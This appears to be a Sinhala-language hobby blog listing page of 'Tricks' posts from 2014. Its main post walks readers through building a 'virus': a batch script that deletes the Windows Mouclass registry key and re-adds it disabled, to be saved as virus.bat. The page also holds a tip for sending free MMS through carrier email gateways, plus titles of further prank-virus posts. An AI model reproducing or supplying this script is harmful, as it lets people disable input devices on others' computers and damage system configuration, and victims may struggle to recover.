Showing posts with label Tricks. Show all posts
Showing posts with label Tricks. Show all posts

Monday, December 22, 2014

Virus හදමුද?(Part 03)



computer එකක් mouse එක disable වෙන virus එකක් හදන හැටි
හරි මම පල්ලෙහායින් දාන code එක ඔයාගේ notepad එකට copy කරගන්න


rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

හරි දැන් ඕක virus.bat
කියලා save කරන්න.

INTERNET එකෙන් නොමිලේ MMS යවමු



ලංකාවෙ MMS එකක් phone එකකට යවන්න Rs.5 ක් විතර යනවා. ඉතින් සත 5ක් වත් යන්නෙ නැතුව MMS යවන්න පුලුවන් විදියක් තියනවා. හැමෝටම mail address එකක් තියනවනේ. හැබැයි මේක තාම කරන්න පුලුවන් Mobitel / Dialog userලට විතරයි. ඔයාලට කරන්න තියෙන්නෙ පහල තියන විදියට mail එකක් යවන්න විතරයි.
Mobitel-    +9471xxxxxxx@mms.mobitel.lk
Dialod - +9477xxxxxxx@mms.dialog.lk

xxxx  වෙනුවට යවන්න ඕන කෙනාගෙ Number එක දාන්න.
තත්පර 10ක් ඇතුලත MMS එක ඒවි.  

තව විදියක් තියනවා.මුලින්ම මේක ක්ලික් කරන්නකෝ.අතුලට ගියාම වැඩේ තෙරෙයි.

Saturday, December 20, 2014

CD Rom එක eject වෙන විදියේ Virus එකක් හදමුද?

CD Rom එක eject වෙන විදියේ Virus එකක් හදමුද?



Monday, August 25, 2014

ගැටමැට්ක් 01

ගැටමැට්ක් 01



Destop එකේ පිලිහුඩුවෙක් පියාබුවොත් කොහොමද?







Showing posts with label Tricks. Show all posts
Showing posts with label Tricks. Show all posts